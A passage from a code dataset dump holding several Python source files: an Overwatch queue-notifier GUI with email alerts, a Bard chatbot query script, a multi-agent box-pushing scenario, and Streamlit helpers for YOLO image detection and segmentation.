Time: \", font=(\"Arial\", 10), bg=\"snow\")\n self.time_label.pack()\n self.update_time()\n\n self.time_spent = 0\n self.time_spent_job = None\n\n #add Queue status label once start button is clicked\n self.queue_status_label = tk.Label(self.right_frame, text=\"Queue Time: \", font=(\"Arial\", 12), bg=\"snow\")\n self.queue_status_label.pack()\n\n # Add a text box to describe how the program works\n description_text = \"\"\"Default set for Overwatch 1920x1080 resolution. click set position to see which pixel the program is looking at. set offset x and y to adjust the pixel position. click start to start the program.\"\"\"\n self.description_box = tk.Text(self.right_frame, height=5, width=40, wrap=\"word\", font=(\"Helvetica\", 10), bg=\"snow\", bd = 1)\n self.description_box.insert(tk.END, description_text)\n self.description_box.config(state=\"disabled\")\n self.description_box.pack()\n\n # add an input box and a button to change the window name\n self.window_name_label = tk.Label(self.right_frame, text=\"Window Name: \", font=(\"Arial\", 10), bg=\"snow\")\n self.window_name_label.pack()\n\n self.window_name_input = tk.Entry(self.right_frame)\n self.window_name_input.insert(0, \"Overwatch\")\n self.window_name_input.pack()\n\n self.window_name_button = tk.Button(self.right_frame, text=\"Set Window Name\", command=self.set_window_name)\n self.window_name_button.configure(bg=\"lightblue\", fg=\"black\", activebackground=\"white\")\n self.window_name_button.pack()\n\n # Add labels and input fields for the coordinates, receiver email, sender email, and sender password\n x_label = tk.Label(self.right_frame, text=\"X Coordinate:\")\n x_label.pack()\n\n self.x_input = tk.Entry(self.right_frame)\n self.x_input.insert(0, \"0\")\n self.x_input.pack()\n\n y_label = tk.Label(self.right_frame, text=\"Y Coordinate:\")\n y_label.pack()\n\n self.y_input = tk.Entry(self.right_frame)\n self.y_input.insert(0, \"0\")\n self.y_input.pack()\n\n self.set_position_button = tk.Button(self.right_frame, text=\"Set Position\", command=self.set_position)\n self.set_position_button.configure(bg=\"lightblue\", fg=\"black\", activebackground=\"white\")\n self.set_position_button.pack()\n\n receiver_label = tk.Label(self.right_frame, text=\"Receiver Email:\")\n receiver_label.pack()\n\n self.receiver_input = tk.Entry(self.right_frame)\n self.receiver_input.pack()\n\n sender_label = tk.Label(self.right_frame, text=\"Sender Email:\")\n sender_label.pack()\n\n self.sender_input = tk.Entry(self.right_frame)\n self.default_sender = \"queuefound@gmail.com\"\n self.sender_input.insert(0, self.default_sender)\n self.sender_input.pack()\n\n password_label = tk.Label(self.right_frame, text=\"Sender Password:\")\n password_label.pack()\n\n self.password_input = tk.Entry(self.right_frame)\n self.password_input.pack()\n\n #add a set_email button\n self.set_email_button = tk.Button(self.right_frame, text=\"Set Email\", command=self.set_email)\n self.set_email_button.configure(bg=\"lightblue\", fg=\"black\", activebackground=\"white\")\n self.set_email_button.pack()\n self.receiver = None\n\n # Add the Start, Stop, and Set Position buttons to the right frame\n self.start_button = tk.Button(self.right_frame, text=\"Start\", command=self.start_queue_watcher)\n self.start_button.configure(bg=\"lightgreen\", fg=\"black\", activebackground=\"white\")\n self.start_button.pack()\n\n self.stop_button = tk.Button(self.right_frame, text=\"Stop\", command=self.stop_queue_watcher, state=\"disabled\")\n self.stop_button.configure(bg=\"pink\", fg=\"black\", activebackground=\"white\")\n self.stop_button.pack()\n\n\n # Add a button to change the background image\n self.current_image_index = 2\n self.image_filenames = [\"mercy.gif\", \"kiroko.gif\", \"hollow.png\"]\n #add a prefix to the list\n self.image_filenames = [resource_path(filename) for filename in self.image_filenames]\n\n self.change_background_button = tk.Button(self.root, text=\"Change Background\", command=self.change_background)\n self.change_background_button.configure(bg=\"white\", fg=\"black\", activebackground=\"white\")\n self.change_background_button.pack(side=\"bottom\")\n\n # add a feeling lucky button next to side of change background button\n self.feeling_lucky_button = tk.Button(self.root, text=\"Feeling Lucky\", command=self.feeling_lucky)\n self.feeling_lucky_button.configure(bg=\"white\", fg=\"black\", activebackground=\"white\")\n self.feeling_lucky_button.pack(side=\"bottom\")\n\n\n # Add the image to the left of the window\n self.background_image = tk.PhotoImage(file=resource_path(\"hollow.png\"))\n self.background_label = tk.Label(self.root, image=self.background_image)\n self.background_label.pack(side=\"left\")\n\n #stop all thread when program is closed\n self.root.protocol(\"WM_DELETE_WINDOW\", self.close_program)\n\n #check if the program is running\n self.check_queue_watcher()\n \n def set_window_name(self):\n window_name = self.window_name_input.get()\n self.queue_watcher = QueueWatcher(window_name)\n if self.queue_watcher.is_window_found():\n messagebox.showinfo(\"Window Found\", window_name + \" window is found\")\n else:\n messagebox.showerror(\"Window Not Found\", window_name + \" window is not found\")\n\n def update_clock(self):\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n self.time_label.config(text=current_time)\n self.root.after(1000, self.update_clock) # update every second\n \n def update_time_spent(self):\n self.time_spent += 1\n self.queue_status_label.config(text=\"Queue Time: \" + str(self.time_spent) + \" seconds\")\n self.time_spent_job = self.root.after(1000, self.update_time_spent)\n \n def clear_time_spent(self):\n self.time_spent = 0\n self.queue_status_label.config(text=\"Queue Time: \" + str(self.time_spent) + \" seconds\")\n if self.time_spent_job is not None:\n self.root.after_cancel(self.time_spent_job)\n \n def feeling_lucky(self):\n messagebox.showinfo(\"Feeling Lucky\", \"You are feeling lucky today!\")\n \n def close_program(self):\n self.queue_watcher.stop()\n self.root.destroy()\n \n def change_background(self):\n # Increment the current image index\n self.current_image_index = (self.current_image_index + 1) % len(self.image_filenames)\n\n # Load the new image and display it\n self.background_image = tk.PhotoImage(file=self.image_filenames[self.current_image_index])\n self.background_label.configure(image=self.background_image)\n\n def update_time(self):\n # Get the current time and format it\n current_time = time.strftime('%H:%M:%S')\n # Update the label text\n self.time_label.configure(text=\"Current time: \" + current_time)\n # Schedule the next update in 1 second\n self.root.after(1000, self.update_time)\n \n #check whether the queuewatcher is running every 1 second\n def check_queue_watcher(self):\n if self.queue_watcher.is_queue_alive():\n self.start_button.config(state=\"disabled\")\n self.stop_button.config(state=\"normal\")\n else:\n self.start_button.config(state=\"normal\")\n self.stop_button.config(state=\"disabled\")\n self.clear_time_spent()\n self.root.after(1000, self.check_queue_watcher)\n\n def start_queue_watcher(self):\n #start count time spent\n self.receiver = self.receiver_input.get()\n logger.info(\"email info: %s\", self.queue_watcher.get_email_info())\n if not self.receiver:\n messagebox.showerror(\"Error\", \"Please enter your email address\")\n return\n self.update_time_spent()\n self.start_button.config(state=\"disabled\")\n self.stop_button.config(state=\"normal\")\n thread = threading.Thread(target=self.queue_watcher.run)\n thread.start()\n\n\n def stop_queue_watcher(self):\n self.clear_time_spent()\n self.stop_button.config(state=\"disabled\")\n self.start_button.config(state=\"normal\")\n self.queue_watcher.stop()\n\n \n def set_position(self):\n self.start_button.config(state=\"normal\")\n x = int(self.x_input.get())\n y = int(self.y_input.get())\n \n screenshot = self.queue_watcher.get_queueing_image()\n self.queue_watcher.set_position(screenshot, show=True, offset_x=x, offset_y=y)\n \n\n def set_email(self):\n receiver = self.receiver_input.get()\n self.receiver = receiver\n sender = self.sender_input.get()\n password = self.password_input.get()\n\n if is_valid_email(sender) is False:\n messagebox.showwarning(\"Invalid Email\", \"Please enter a valid sender email address\")\n return\n \n if is_valid_email(receiver) is False:\n messagebox.showwarning(\"Invalid Email\", \"Please enter a valid receiver email address\")\n return\n\n if sender and sender != self.default_sender and not password:\n messagebox.showwarning(\"No Password\", \"No password is set for your own email\")\n return\n\n if not receiver:\n messagebox.showwarning(\"Error\", \"Please enter your receiver email address\")\n return\n\n self.queue_watcher.set_email_info(sender, password, receiver)\n messagebox.showinfo(\"Email Set\", \"sender: \" + sender + \"\\n receiver: \" + receiver)\n \n def run(self):\n self.root.mainloop()\n\n\nif __name__ == '__main__':\n gui = QueueWatcherGUI()\n gui.run()\n","repo_name":"qihang-dai/Overwatch2_QueueNotifier","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":11032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"13747254493","text":"import os\nfrom Bard import Chatbot\n\ndef bard():\n token = open('token.txt', 'r').read().strip('\\n').strip()\n\n bot = Chatbot(token)\n\n question = open('test.txt', 'r').read().strip('\\n').strip()\n\n output = bot.ask(question)['content']\n\n print(output)\n \nif __name__ == '__main__':\n bard()","repo_name":"AnthonySinitsa/PythonPlayGround","sub_path":"api/bard.py","file_name":"bard.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"4304170829","text":"import numpy as np\nfrom multiagent.core import World, Agent, Landmark, Goal, Border\nfrom multiagent.scenario import BaseScenario\n\n\nclass Scenario(BaseScenario):\n def make_world(self, mode):\n \"\"\"\n - mode0: Pretrain from room2 to room1\n - mode1: Pretrain from room1 to target\n - mode2: Train from room2 to target\n \"\"\"\n world = World()\n self.mode = mode\n\n # add agents\n world.agents = [Agent() for i in range(2)]\n for i, agent in enumerate(world.agents):\n agent.name = 'agent %d' % i\n agent.collide = True\n agent.silent = True\n agent.size = 0.1\n agent.color = np.array([1.0, 0.0, 0.0]) if i == 0 else np.array([0.0, 1.0, 0.0])\n\n # add boxes\n self.box = Landmark()\n self.box.name = 'box'\n self.box.collide = True\n self.box.movable = True\n self.box.size = 0.25 # Radius\n self.box.initial_mass = 3.\n self.box.color = np.array([0.25, 0.25, 0.25])\n world.landmarks.append(self.box)\n\n # add targets\n self.target = Landmark()\n self.target.name = 'target'\n self.target.collide = False\n self.target.movable = False\n self.target.size = 0.05\n self.target.color = np.array([0.25, 0.25, 0.25])\n world.landmarks.append(self.target)\n\n # add borders\n self.add_borders(world)\n\n # add goals (used only for vis)\n world.goals = [Goal() for i in range(2)]\n for i, goal in enumerate(world.goals):\n goal.name = 'goal %d' % i\n goal.collide = False\n goal.movable = False\n goal.color = world.agents[i].color\n\n # make initial conditions\n self.reset_world(world)\n \n return world\n\n def add_borders(self, world):\n \"\"\" Adding the center border \"\"\"\n # Parameters\n self.length = 1.4\n offset = 0.1 # Distance between center to center\n n_border = round(self.length / offset)\n center_border = [Border() for _ in range(n_border)]\n\n # Add the center border\n x, y = 0, -1 + (offset / 2.)\n for border in center_border:\n border.name = \"border\"\n border.collide = True\n border.movable = False\n border.size = offset / 2.\n border.shape = [\n [-border.size, -border.size],\n [border.size, -border.size],\n [border.size, border.size],\n [-border.size, border.size]]\n border.color = np.array([0.25, 0.25, 0.25])\n border.state.p_vel = np.zeros(world.dim_p)\n border.state.p_pos = np.asarray([x, y])\n world.borders.append(border)\n\n x, y = x, y + offset\n\n # Define room1 and room2\n self.x_room1_from = -1.\n self.x_room1_to = 0. - border.size\n self.y_room1_from = -1.\n self.y_room1_to = +1.\n\n self.x_room2_from = 0. + border.size\n self.x_room2_to = 1.\n self.y_room2_from = -1.\n self.y_room2_to = +1.\n\n # Define boundary between room 1 and room 2\n self.boundary_pos = np.array([0., (self.length - 1.) + self.box.size])\n\n def reset_world(self, world):\n # random properties for agents\n # NOTE Agents always starting inside room 2\n for i, agent in enumerate(world.agents):\n agent.state.p_vel = np.zeros(world.dim_p)\n agent.state.c = np.zeros(world.dim_c)\n\n agent.state.p_pos = np.zeros(world.dim_p)\n agent.state.p_pos[0] = np.random.uniform(\n low=self.x_room2_from + agent.size * 1.5,\n high=self.x_room2_to - agent.size * 1.5)\n agent.state.p_pos[1] = np.random.uniform(\n low=self.y_room2_from + agent.size * 1.5,\n high=self.y_room2_to - agent.size * 1.5)\n\n # random properties for box\n # At mode 1, we initialize box at the boundary (with some noise)\n self.box.state.p_vel = np.zeros(world.dim_p)\n if self.mode == 0 or self.mode == 2:\n self.box.state.p_pos = np.array([self.boundary_pos[1], 0.])\n elif self.mode == 1:\n self.box.state.p_pos = np.array([0., self.boundary_pos[1]])\n\n # reset properties for target\n self.target.state.p_vel = np.zeros(world.dim_p)\n self.target.state.p_pos = np.array([-self.boundary_pos[1], 0.])\n\n # reset properties for goals (vis purpose)\n for i, goal in enumerate(world.goals):\n goal.state.p_pos = np.zeros(world.dim_p) - 2 # Initialize outside of the box\n goal.state.p_vel = np.zeros(world.dim_p)\n\n def reward(self, agent, world):\n # Inside Room 1\n if self.box.state.p_pos[0] < 0.:\n dist = np.sum(np.square(self.box.state.p_pos - self.target.state.p_pos))\n # Inside Room 2\n # NOTE room1_dist refers to maximum distance w.r.t room 1\n elif self.box.state.p_pos[0] >= 0.:\n room1_dist = np.sum(np.square(np.array([0., 1.]) - self.target.state.p_pos))\n room2_dist = np.sum(np.square(self.boundary_pos - self.box.state.p_pos))\n dist = room1_dist + room2_dist\n else:\n raise ValueError()\n\n return -dist / 10. # Reward scale\n\n def observation(self, agent, world):\n # get positions of all entities\n entity_pos = []\n entity_pos.append(self.box.state.p_pos)\n entity_pos.append(self.target.state.p_pos)\n\n # Add other agent position\n other_pos = []\n for other in world.agents:\n if other is agent: \n continue\n other_pos.append(other.state.p_pos)\n\n # border position\n border_pos = []\n border_pos.append(np.array([0., -1.]))\n border_pos.append(np.array([0., (self.length - 1.)]))\n\n return np.concatenate([agent.state.p_vel] + [agent.state.p_pos] + entity_pos + other_pos + border_pos)\n","repo_name":"MachengShen/robust_opponent_modeling","sub_path":"multiagent-particle-envs/multiagent/scenarios/maze_push.py","file_name":"maze_push.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"21183243011","text":"import math\nfrom ultralytics import YOLO\nimport streamlit as st\nimport pandas as pd\nimport os\nimport cv2\nimport numpy as np\nimport ffmpegcv\nimport supervision as sv\nfrom supervision.draw.color import Color\nfrom streamlit_image_annotation import detection\nimport os, shutil\nimport zipfile\nfrom pathlib import Path\n\nimport settings\n\n\ndef clear_folder(folder):\n if os.path.exists(folder):\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\ndef init_func():\n # init_models()\n st.session_state['initialized'] = True\n #remove detected images\n clear_folder(settings.RESULTS_DIR)\n clear_folder(settings.IMAGES_DIR)\n clear_folder(settings.DATA_DIR)\n clear_folder(settings.VIDEO_RES)\n\n\n\n# Checks that a new image is loaded\n# Changes the session state accordingly\ndef change_image(img_list):\n if st.session_state.next_img == True:\n st.session_state.next_img = False\n st.session_state['detect'] = False\n st.session_state['predicted'] = False\n st.session_state.img_num += 1\n if(st.session_state.img_num >= len(img_list)):\n st.write(\"At the end of image list! Upload more images\")\n st.session_state.img_num = 0\n if img_list:\n img = img_list[st.session_state.img_num]\n else:\n img = None\n if img.name != st.session_state.image_name:\n st.session_state['detect'] = False\n st.session_state['predicted'] = False\n st.session_state.image_name = img.name\n \n\n# Use this to repredict IMMEDIATELY, \n# Detect Does not have to be pressed again\ndef repredict():\n st.session_state['predicted'] = False\n st.session_state.segmented = False\n\n\n# Use this to repredict AFTER pressing detect\ndef redetect():\n st.session_state['predicted'] = False\n st.session_state['detect'] = False\n st.session_state.segmented = False\n\n# Detect Button \ndef click_detect():\n st.session_state['detect'] = True\n \n\n\n# Predict Function\n# Performs the object detection and image segmentation\ndef predict(_model, _uploaded_image, confidence, detect_type):\n boxes = []\n labels = []\n col1, col2 = st.columns(2)\n # Detection Stage\n if st.session_state['predicted'] == False:\n if st.session_state.model_type == \"Built-in\":\n res = _model.predict(_uploaded_image, conf=confidence, classes = [0,2,3], max_det=settings.MAX_DETECTION)\n res1 = _model.predict(_uploaded_image, conf=st.session_state.kelp_conf, classes = [1], max_det=settings.MAX_DETECTION)\n \n classes = res[0].names\n detections1 = sv.Detections.from_yolov8(res[0])\n detections2 = sv.Detections.from_yolov8(res1[0])\n detections = sv.Detections.merge([detections2, detections1])\n\n if detections1.mask is None:\n detections.mask = detections2.mask\n elif detections2.mask is None:\n detections.mask = detections1.mask\n boxes = detections.xyxy\n else:\n res = _model.predict(_uploaded_image, conf=confidence)\n classes = res[0].names\n detections = sv.Detections.from_yolov8(res[0])\n boxes = detections.xyxy\n\n if(detections is not None):\n labels = [\n f\"{idx} {classes[class_id]} {confidence:0.2f}\"\n for idx, [_, _, confidence, class_id, _] in enumerate(detections)\n ]\n \n box_annotator = sv.BoxAnnotator(text_scale=2, text_thickness=3, thickness=3, text_color=Color.white())\n annotated_image = box_annotator.annotate(scene=np.array(_uploaded_image), detections=detections, labels=labels)\n with col1:\n st.image(annotated_image, caption='Detected Image', use_column_width=True)\n st.session_state.results = [boxes, detections, classes, labels, annotated_image]\n #Interactive Detection Stage\n if interactive_detections():\n #Need to re-run segmenter, the bounding boxes have changed\n st.session_state.segmented = False\n\n #Segmentation Stage\n if detect_type == \"Objects + Segmentation\" and st.session_state.segmented == False:\n with col2:\n with st.spinner('Running Segmenter...'):\n #Show the Segmentation\n new_boxes = np.array(st.session_state['result_dict'][st.session_state.image_name]['bboxes'])\n new_boxes = np.floor(new_boxes)\n # Only choose the detection masks that have the same boxes as new_boxes\n cur_boxes = st.session_state.results[0]\n cur_boxes = np.floor(cur_boxes)\n for idx, [_, _, confidence, class_id, _] in enumerate(detections):\n if cur_boxes[idx] not in new_boxes:\n detections.mask[idx] = None\n\n # annotate image with detections\n box_annotator = sv.BoxAnnotator()\n mask_annotator = sv.MaskAnnotator()\n annotated_image = mask_annotator.annotate(scene=np.array(_uploaded_image), detections=detections)\n \n st.image(annotated_image, caption='Segmented Image', use_column_width=True)\n st.session_state.segmented = True\n st.session_state['predicted'] = True\n st.session_state.results[1] = detections \n \n\n#Results Calculations\ndef results_math( _image, detect_type):\n boxes, detections, classes ,_ ,_ = st.session_state.results\n\n if detect_type == \"Objects + Segmentation\" and detections.mask is not None:\n segmentation_mask = detections.mask\n class_id_list = detections.class_id\n binary_mask = np.where(segmentation_mask > 0.5, 1, 0)\n\n white_background = np.ones_like(_image) * 255\n new_images = white_background * (1 - binary_mask[..., np.newaxis]) + _image * binary_mask[..., np.newaxis]\n \n # Initialize empty lists to store data\n index_list = []\n class_id_list = []\n result_list = []\n confidence_list = []\n diameter_list = []\n\n # formatted boxes from manual annotator\n new_boxes = [[b[0], b[1], b[2]+b[0], b[3]+b[1]] for b in st.session_state['result_dict'][st.session_state.image_name]['bboxes']]\n new_boxes = np.array(new_boxes)\n\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n #Side length of PVC box in cm - Taken from the user\n side_length_PVC = st.session_state.side_length\n\n detected_boxes = np.floor(boxes)\n new_boxes = np.floor(new_boxes)\n\n for idx, [_, _, confidence, class_id, _] in enumerate(detections):\n if detected_boxes[idx] in new_boxes:\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n #Get % of non white pixels inside box (assumed box height is height of image)\n percentage_of_box = np.sum(new_images[idx] != 255) / (new_images[idx].shape[0]*new_images[idx].shape[0]) * 100\n #Area of mask is area of PVC * percentage_of_box / 100\n result = side_length_PVC * side_length_PVC * percentage_of_box / 100\n #Calculate diameter\n diameter = 2 * np.sqrt(result / np.pi)\n diameter_list.append(diameter)\n elif st.session_state.drop_quadrat == \"Percentage\":\n #Just percentage, no diameter\n result = np.sum(new_images[idx] != 255) / (new_images[idx].size) * 100\n result_list.append(result)\n # Append values to respective lists\n index_list.append(idx)\n class_id_list.append(st.session_state.class_list[class_id])\n confidence_list.append(confidence)\n #Add any boxes from manual annotator\n for idx, box in enumerate(new_boxes):\n if box not in detected_boxes:\n if detect_type == \"Objects + Segmentation\":\n result_list.append(0)\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n diameter_list.append(0)\n #This is a new box\n index_list.append(idx)\n class_id_list.append(st.session_state.class_list[st.session_state['result_dict'][st.session_state.image_name]['labels'][idx]])\n confidence_list.append(1)\n # select_list.append(True)\n\n # Create DataFrame\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Area (cm^2)': result_list,\n 'Diameter (cm)': diameter_list,\n 'Confidence': confidence_list\n }\n elif st.session_state.drop_quadrat == \"Percentage\":\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Coverage (%)': result_list,\n 'Confidence': confidence_list\n }\n else:\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Confidence': confidence_list\n }\n\n df = pd.DataFrame(data)\n\n # Set class_id as the index\n df.set_index('class_id', inplace=True)\n\n st.write(\"Image Detection Results\")\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Area (cm^2)\", \"Diameter (cm)\", \"Confidence\"])\n else:\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Coverage (%)\", \"Confidence\"])\n else:\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Confidence\"])\n \n #Manual Substrate Selection\n substrate = substrate_selection()\n\n #Making the dataframe for an excel sheet\n excel = {}\n excel['Image'] = st.session_state.image_name\n for cl in st.session_state.class_list:\n col1 = f\"(#) \" + cl\n excel[col1] = 0\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n col2 = f\"Total \" + cl + f\" Area (cm^2) \" \n col3 = f\"Average \" + cl + f\" Diameter (cm)\"\n excel[col2] = 0.00\n excel[col3] = 0.00\n else:\n col2 = cl + f\" Coverage(%)\" \n excel[col2] = 0.00\n \n \n excel['Substrate'] = substrate\n dfex = pd.DataFrame(excel, index=[st.session_state.image_name])\n\n #Put data into the excel dataframe\n for index, row in edited_df.iterrows():\n #Only add data if row is selected\n id = index\n class_num = f\"(#) \" + id\n #Increment number of class\n dfex.loc[st.session_state.image_name, class_num] += 1\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n coverage = row['Area (cm^2)']\n class_per = f\"Total \" + id + f\" Area (cm^2) \" \n #Add to total coverage\n dfex.loc[st.session_state.image_name, class_per] += coverage\n\n #Get Average diameter - Take previous average, and use:\n # avg_new = ((n-1)*avg_old + d_new)/n\n class_diameter = f\"Average \" + id + f\" Diameter (cm)\"\n d_new = row['Diameter (cm)']\n avg_old = dfex.loc[st.session_state.image_name, class_diameter]\n n = dfex.loc[st.session_state.image_name, class_num]\n avg_new = ((n-1)*avg_old + d_new)/n\n dfex.loc[st.session_state.image_name, class_diameter] = avg_new\n else:\n coverage = row['Coverage (%)']\n class_per = id + f\" Coverage(%)\" \n #Add to total coverage\n dfex.loc[st.session_state.image_name, class_per] += coverage\n\n #Return Excel Dataframe\n return dfex\n\ndef add_to_list(data, _image):\n if st.session_state.list is not None:\n #Check for duplicates\n for index, row in st.session_state.list.iterrows():\n if row['Image'] == data['Image'][0]:\n st.session_state.list= st.session_state.list.drop(index)\n\n frames = [st.session_state.list, data]\n st.session_state.list = pd.concat(frames)\n else:\n st.session_state.list = data\n st.session_state.add_to_list = True\n\n #Save the detected image result\n image_path = Path(settings.RESULTS_DIR, st.session_state.image_name)\n #Make a new image with the manual annotations\n saved_image = np.array(_image.copy())\n new_boxes = np.floor(np.array([[b[0], b[1], b[2]+b[0], b[3]+b[1]] for b in st.session_state['result_dict'][st.session_state.image_name]['bboxes']]))\n labels = st.session_state['result_dict'][st.session_state.image_name]['labels']\n for idx, box in enumerate(new_boxes):\n saved_image = cv2.rectangle(saved_image, (int(box[0]), int(box[1])), (int(box[2]), int(box[3])), settings.COLOR_LIST[labels[idx]], 3)\n cv2.imwrite(str(image_path), cv2.cvtColor(saved_image, cv2.COLOR_RGB2BGR))\n #Make the data dump text file here as well\n dump_data()\n\ndef add_to_listv(data):\n if st.session_state.list is not None:\n\n frames = [st.session_state.list, data]\n st.session_state.list = pd.concat(frames)\n else:\n st.session_state.list = data\n st.session_state.add_to_list = True\n\ndef clear_image_list():\n st.session_state.list = None\n st.session_state.add_to_list = False\n st.session_state.class_list = []\n clear_folder(settings.RESULTS_DIR)\n clear_folder(settings.VIDEO_RES)\n st.experimental_rerun()\n\ndef substrate_selection():\n data_df = pd.DataFrame(\n {\n \"Substrate\":[\n \"Sandy\",\n ],\n }\n )\n res = st.data_editor(\n data_df,\n column_config={\n \"Substrate\": st.column_config.SelectboxColumn(\n \"Substrate\",\n help = \"Manual Substrate Selection\",\n width = \"medium\",\n options = [\n \"Sandy\",\n \"Mixed\",\n \"Rocky\",\n ],\n )\n },\n hide_index = True,\n )\n return res.loc[0][\"Substrate\"]\n\ndef zip_images():\n if not os.path.exists('Detected_Images'):\n os.mkdir('Detected_Images')\n\n if os.path.exists(\"Detected_Images/Detection_Images.zip\"):\n os.remove(\"Detected_Images/Detection_Images.zip\")\n file_paths = get_all_file_paths(\"Detected_Images\")\n with zipfile.ZipFile('Detected_Images/Detection_Images.zip', 'w') as img_zip:\n for file in file_paths:\n img_zip.write(file)\n with open(\"Detected_Images/Detection_Images.zip\", 'rb') as fp:\n st.download_button( label = \"Download Images\",\n help = \"Download detection result images\",\n data = fp,\n file_name = \"Detection_Images.zip\",\n mime='text/zip')\n\ndef zip_video():\n if not os.path.exists('Detected_Videos'):\n os.mkdir('Detected_Videos')\n\n if os.path.exists(\"Detected_Videos/Detected_Videos.zip\"):\n os.remove(\"Detected_Videos/Detected_Videos.zip\")\n file_paths = get_all_file_paths(\"Detected_Videos\")\n with zipfile.ZipFile('Detected_Videos/Detected_Videos.zip', 'w') as img_zip:\n for file in file_paths:\n img_zip.write(file)\n with open(\"Detected_Videos/Detected_Videos.zip\", 'rb') as fp:\n st.download_button( label = \"Download Video\",\n help = \"Download detection result videos\",\n data = fp,\n file_name = \"Detected_Video.zip\",\n mime='text/zip')\n\ndef get_all_file_paths(directory):\n # initializing empty file paths list\n file_paths = []\n \n # crawling through directory and subdirectories\n for root, directories, files in os.walk(directory):\n for filename in files:\n # join the two strings in order to form the full filepath.\n filepath = os.path.join(root, filename)\n file_paths.append(filepath)\n \n # returning all file paths\n return file_paths \n\n\ndef interactive_detections():\n #Grab the list of classes for this detection\n label_list = st.session_state.class_list + list(st.session_state.results[2].values())\n if st.session_state.manual_class != \"\":\n label_list += [st.session_state.manual_class]\n #Remove duplicates\n label_list = list(dict.fromkeys(label_list))\n st.session_state.class_list = label_list\n\n bboxes = []\n labels = []\n\n if 'result_dict' not in st.session_state:\n result_dict = {}\n st.session_state['result_dict'] = result_dict.copy()\n if st.session_state.image_name not in st.session_state.result_dict:\n st.session_state['result_dict'][st.session_state.image_name] = {'bboxes': bboxes,'labels':labels}\n\n #This is the first run, take the results from the initial detection\n if st.session_state['predicted'] == False:\n for box in st.session_state.results[0]:\n width = box[2] - box[0]\n height = box[3] - box[1]\n bboxes.append([box[0], box[1], width, height])\n for detections in st.session_state.results[1]:\n labels.append(int(detections[3])) \n st.session_state['result_dict'][st.session_state.image_name] = {'bboxes': bboxes,'labels':labels}\n else:\n bboxes = st.session_state['result_dict'][st.session_state.image_name]['bboxes']\n labels = st.session_state['result_dict'][st.session_state.image_name]['labels']\n\n target_image_path = Path(settings.IMAGES_DIR , st.session_state.image_name)\n new_labels = detection(image_path=target_image_path, \n bboxes=bboxes, \n labels=labels, \n label_list=label_list, \n height = 1080,\n width = 1920)\n if new_labels is not None:\n st.session_state['result_dict'][st.session_state.image_name]['labels'] = [v['label_id'] for v in new_labels]\n st.session_state['result_dict'][st.session_state.image_name]['bboxes'] = [v['bbox'] for v in new_labels]\n return True\n else:\n return False\n\n\ndef load_model(model_path):\n model = YOLO(model_path)\n return model\n\ndef dump_data():\n #Text files are normalized center point, normalized width/height\n #index x y w h \n if not os.path.exists('Dump'):\n os.mkdir('Dump')\n # boxes, _, classes, labels, _ = st.session_state.results\n boxes = np.array([[b[0], b[1], b[2]+b[0], b[3]+b[1]] for b in st.session_state['result_dict'][st.session_state.image_name]['bboxes']])\n h, w, x = st.session_state.results[4].shape\n file_name = \"Dump/\" + st.session_state.image_name[:-3] + \"txt\"\n with open(file_name, 'a') as f:\n for idx, box in enumerate(boxes):\n wn = float(box[2]-box[0]) / w\n hn = float(box[3] - box[1]) / h\n x1n = float(box[0] + float(box[2]-box[0])/2) / w\n y1n = float(box[1] + float(box[3] - box[1])/2) / h\n cl = st.session_state['result_dict'][st.session_state.image_name]['labels'][idx]\n text_str = f'{cl} {x1n:.3f} {y1n:.3f} {wn:.3f} {hn:.3f} \\n'\n f.write(text_str)\n\n\ndef dump_data_button():\n if os.path.exists(\"Dump/data.yaml\"):\n os.remove(\"Dump/data.yaml\") \n #Make the YAML file\n classes = st.session_state.results[2]\n str1 = f'nc: {len(classes)}\\n'\n str2 = f\"names: [\"\n for name in classes.values():\n str2 += f\"'{name}', \"\n str2 = str2[:-2] + \"]\"\n with open(\"Dump/data.yaml\", 'w') as fp:\n fp.write(str1)\n fp.write(str2)\n\n #Zip the Data\n if os.path.exists(\"Dump/Detection_Data.zip\"):\n os.remove(\"Dump/Detection_Data.zip\")\n file_paths = get_all_file_paths(\"Dump\")\n with zipfile.ZipFile('Dump/Detection_Data.zip', 'w') as img_zip:\n for file in file_paths:\n img_zip.write(file)\n with open(\"Dump/Detection_Data.zip\", 'rb') as fp:\n st.download_button( label = \"Detection Data Dump\",\n help = \"Dump all YOLO Detection data, which can be used to train future models.\",\n data = fp,\n file_name = \"Detection_Data.zip\",\n mime='text/zip')\n\n return\ndef display_tracker_options():\n return True, \"bytetrack.yaml\"\n # display_tracker = st.radio(\"Display Tracker\", ('Yes', 'No'))\n # is_display_tracker = True if display_tracker == 'Yes' else False\n # if is_display_tracker:\n # tracker_type = st.radio(\"Tracker\", (\"bytetrack.yaml\", \"botsort.yaml\"))\n # return 